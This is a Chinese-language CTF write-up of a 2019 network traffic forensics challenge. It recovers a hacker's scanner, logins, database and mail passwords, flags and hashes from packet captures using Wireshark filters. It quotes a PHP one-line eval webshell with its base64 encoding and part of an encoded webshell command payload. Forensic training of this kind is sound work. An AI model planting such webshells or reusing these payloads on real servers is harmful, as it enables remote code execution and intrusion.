题目
2019.8 安恒流量分析
- 某公司内网网络被黑客渗透,请分析流量,给出黑客使用的扫描器
- 某公司内网网络被黑客渗透,请分析流量,得到黑客扫描到的登陆后台是(相对路径即可)
- 某公司内网网络被黑客渗透,请分析流量,得到黑客使用了什么账号密码登陆了web后台(形式:username/password)
- 某公司内网网络被黑客渗透,请分析流量,得到黑客上传的webshell文件名是,内容是什么,提交webshell内容的base编码
- 某公司内网网络被黑客渗透,请分析流量,黑客在robots.txt中找到的flag是什么
- 某公司内网网络被黑客渗透,请分析流量,黑客找到的数据库密码是多少
- 某公司内网网络被黑客渗透,请分析流量,黑客在数据库中找到的hash_code是什么
- 某公司内网网络被黑客渗透,请分析流量,黑客破解了账号ijnu@test.com得到的密码是什么
- 某公司内网网络被黑客渗透,请分析流量,被黑客攻击的web服务器,网卡配置是是什么,提交网卡内网ip
- 某公司内网网络被黑客渗透,请分析流量,黑客使用了什么账号登陆了mail系统(形式: username/password)
- 某公司内网网络被黑客渗透,请分析流量,黑客获得的vpn的ip是少
题目分析
1.观察12281号包,看HTTP层的referrer,发现了AWVS的扫描器特征。
2.过滤http协议,发现/admin/login.php
3.过滤http协议,看86号包,发现了表单数据 username 人事 password hr123456(错误答案)
302跳转代表登陆成功
使用http contains “rec=login” and http.request.method==POST and ip.src==192.168.94.59 语句对webone进行过滤,将结果对时间进行排序,发现最后一个包中的username admin password admin!@#pass123
4.a.php 翻到最后发现了a.php 然后分组列表搜a.php 找POST包
Form item: “action” = “QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJb
使用 http contains “<?php @eval” 过滤找一句话木马,但是没找到。
考虑TCP 重传可能导致http没追踪到,所以考虑使用tcp contains “<?php @eval”
发现了
1 | @eval($_POST[1234]); |
将其base64encode即可。
1 | PD9waHAgQGV2YWwoJF9QT1NUWzEyMzRdKTs/Pg== |
5.搜字符串robots.txt 发现flag flag:87b7cb79481f317bde90c116cf36084b
6.找到webshell的名称后,一直跟踪webshell,看看她在做什么。数据包大概在734581。
后面会发现查看了数据库配置文件,就发现了数据库账号密码 dbuser web dbpass e667jUPvJjXHvEUv
7.在web2数据包中 过滤mysql协议 分组字节流搜索字符串hash_code 看response包发现hash_code d1c029893df40cb0f47bcf8f1c3c17ac
8.web2数据包中 过滤mysql协议 搜索字符串 ijnu@test.com ,看到md5加密的密码b78f5aa6e1606f07def6e839121a22ec,解密一下得到edc123!@#
9.追踪webshell包,发现了ifconfig命令。
->|eth0 Link encap:Ethernet HWaddr 00:0C:29:CB:9F:85 \n
inet addr:192.168.32.189 Bcast:192.168.32.255 Mask:255.255.255.0\n
10.打开mailtwo数据包,过滤http流,发现第一个数据包里面的动作是登出,发现了用户名wenwenni。
然后看28号数据包的操作是访问登录页面,35号数据包发现了密码加密函数。
是AES-CBC加密,key为1234567812345678。
继续看42 44数据包,还是wenwenni用户登录,并且返回了 success true.
尝试使用如下过滤器过滤:
1 | (http contains "{\"success\":true}" or http.request.method=="POST") and ip.addr==192.168.94.59 |
发现到最后也没爆破成功(这题看的别人的思路,我没懂)
然后打开mailto1 继续使用上述语句过滤
发现18512登陆成功,则密码在17126号数据包中。+ZgE14UGcFcyRGLI0/ZXPQ==
密码为1234567812345678的MD5值,偏移量为1234567812345678
AES解密得admin!@#PASS123
11.第一个vpn数据包在尝试登录vpn,然后看第二个。
统计一下会话信息,发现10.3.4.3 10.3.4.96 10.3.4.55 这几个ip之间的通信较多,然后过滤看看。
过滤一下smb协议,发现10.3.4.96是SMB服务器。
然后在看一下55这个ip
ip.addr==10.3.4.55
发现10.3.4.3首先ping了10.3.4.55 所以确定10.3.4.3是黑客使用的vpn服务器。
总结
对一些有手就行的过滤方法用的还可以,但是深入一点就不太行了 对一些流量动作的分析不太到位,对filter的用法也不太熟悉,比如\表转义。继续学习!
